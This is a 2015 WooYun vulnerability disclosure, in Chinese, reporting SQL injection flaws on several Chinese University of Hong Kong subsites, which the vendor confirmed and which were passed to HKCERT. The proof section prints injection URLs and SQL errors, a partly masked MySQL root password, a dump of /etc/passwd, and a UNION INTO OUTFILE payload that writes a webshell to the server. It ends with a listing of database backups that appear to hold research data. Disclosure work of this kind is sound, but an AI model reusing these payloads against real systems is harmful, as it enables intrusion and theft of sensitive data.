当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145559

漏洞标题:香港中文大学多个分站存在SQL注入漏洞礼包(可获得系统权限)(香港地區)

相关厂商:香港中文大学

漏洞作者: 路人甲

提交时间:2015-10-09 20:14

修复时间:2015-11-26 17:30

公开时间:2015-11-26 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

香港中文大学多个分站存在SQL注入漏洞礼包(均可获得系统权限)
网络架构中部署了WAF等安全设备防御SQL注入,但是都可以Bypass掉

详细说明:

#1 漏洞描述
注入漏洞1:
http://**.**.**.**/index.php?rSite/Index&sysPageId=141202171042413'

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and 
tm.sys_theme_map_id = 2014092414320100' at line 9. The SQL statement executed was: select
nmi.sys_navbar_menu_item_id
from
tbl_navbar_menu_item nmi, tbl_navbar_menu nm, tbl_navbar_menu_item_map nmim, tbl_theme_map tm
where
nm.sys_navbar_menu_id = tm.sys_navbar_menu_id and
nmim.sys_navbar_menu_id = nm.sys_navbar_menu_id and
nmim.sys_navbar_menu_item_id = nmi.sys_navbar_menu_item_id and
nmi.sys_page_id = 141202171042413' and 
tm.sys_theme_map_id = 2014092414320100;


注入漏洞2:http://**.**.**.**/upload/download.php?id=123'

Error in selecting table.
Statement: select * from upload where id='123''
Reasons: 1064, You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123''' at line 1

漏洞证明:

# 注入漏洞1利用
~ phpmyadmin
http://**.**.**.**/phpmyadmin

用户:root
密码:my2014*****


~ 进入后台

cuhk_admin.png


available databases [7]:
[*] cdcol
[*] information_schema
[*] mysql
[*] myunits_cms
[*] performance_schema
[*] phpmyadmin
[*] test


系统权限:

[/opt/lampp/ ]$cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ftp:x:106:112:ftp daemon,,,:/srv/ftp:/bin/false
ccl:x:1001:1001:,,,:/home/ccl:/bin/bash
aiscl:x:1002:1002:,,,:/home/aiscl:/bin/bash
mysql:x:999:999::/home/mysql:/bin/sh


[/opt/lampp/ ]$cat /etc/issue
Ubuntu 12.04.4 LTS \n \l


# 注入漏洞2利用
这个注入漏洞root权限起来的,可以直接into outfile 写入shell

https://**.**.**.**/upload/download.php?id=321' and 1=2 union select 1,2,3,123,5,6,7,8,9,10,11,12,13 into outfile '/home/aic/public_html/upload/123.txt'#


shell it:
http://**.**.**.**/upload/123.txt

cuhk_shell.png


很多数据受影响:

[*] 基本信息 [ 	Linux **.**.**.** 2.6.32-431.23.3.el6.x86_64 #1 SMP Thu Jul 31 17:20:51 UTC 2014 x86_64(mysql) ]
[/DBbackup/]$ ls
WordPress.sql.gz
acls.sql.gz
aic.sql.gz
aic2013.sql.gz
aic_account_record.sql.gz
aic_mcq_student.sql.gz
aic_mcq_student_hawkesbay.sql.gz
aic_mcq_student_iceland.sql.gz
aic_mcq_student_nepean.sql.gz
aic_mcq_student_pune.sql.gz
aic_trial1.sql.gz
aicca.sql.gz
aicps.sql.gz
apr.sql.gz
atrial.sql.gz
aware.sql.gz
basic.sql.gz
basic_dhs_for_nurses_study.sql.gz
basicchest.sql.gz
cdaq.sql.gz
chronic_pain.sql.gz
cir.sql.gz
coda.sql.gz
cpd.sql.gz
crt.sql.gz
crt_etsu.sql.gz
crt_warwick.sql.gz
elderly.sql.gz
enigma3.sql.gz
foldback.sql.gz
gaqir.sql.gz
hk-a-line-web.sql.gz
ih.sql.gz
iir.sql.gz
irr2000-2010.sql.gz
issps.sql.gz
issps2010.sql.gz
issps2011.sql.gz
issps2012.sql.gz
issps2013.sql.gz
issps2014.sql.gz
ktlee.sql.gz
labrequest.sql.gz
matthew.sql.gz
mcq3.sql.gz
mmr.sql.gz
mv_mcq.sql.gz
mysql.sql.gz
nitrous.sql.gz
ota.sql.gz
pcrdb.sql.gz
pss.sql.gz
sleep.sql.gz
sprs.sql.gz
test.sql.gz
tpspre.sql.gz
trainee.sql.gz
uosa.sql.gz
upload.sql.gz
vap_study.sql.gz
vision_study.sql.gz
wk2004.sql.gz
[/DBbackup/]$

修复方案:

#1 修改WAF的BUG
#2 真正的解决掉SQL注入漏洞

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-12 17:29

厂商回复:

已將事件通知有關機構

最新状态:

暂无